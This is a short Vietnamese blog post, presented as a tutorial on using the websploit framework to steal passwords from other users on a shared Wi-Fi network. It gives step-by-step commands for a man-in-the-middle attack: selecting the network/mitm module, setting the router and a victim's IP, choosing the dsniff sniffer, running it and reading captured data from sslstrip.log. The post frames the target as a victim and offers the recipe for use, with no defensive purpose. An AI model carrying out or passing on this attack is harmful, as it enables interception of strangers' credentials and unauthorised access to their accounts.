Breaking

Hướng dẫn dùng websploit để đánh cắp mật khẩu

Kỷ niệm ngày Crush mình khen ĐZ tớ sẽ hướng dẫn cho các bạn cách dùng websploit  nhá !! :))
Thực hiện websploit
 2- Tớ viết lệnh sau đây để hiển thị các module : show modules

 3 Bây giờ tớ chọn mạng / MITM bằng lệnh :
use network/mitm
show options








set interface eth0
Lệnh bên trên là giúp tớ tiến hành công việc !!
-Các Router ip  : set router 192.168.0.1

-Các IP máy chủ mà bạn muốn sniff mật khẩu , có thể sử dụng etercap và xem các kết nối với wifi của IP và chọn một trong số họ dùng lệnh :

set target 192.168.0.11

- Tớ chọn các loại sniffer, trong trường hợp này tớ chọn sniff  là các url  của nạn nhân ;

set sniffer dsniff

tớ chạy nó : run



Bây giờ chúng ta hãy các thư mục chủ và kiểm tra các tập tin sslstrip.log  và thấy kết quả !!!!
 ai không hiểu xem video nhé !!

Powered by Blogger.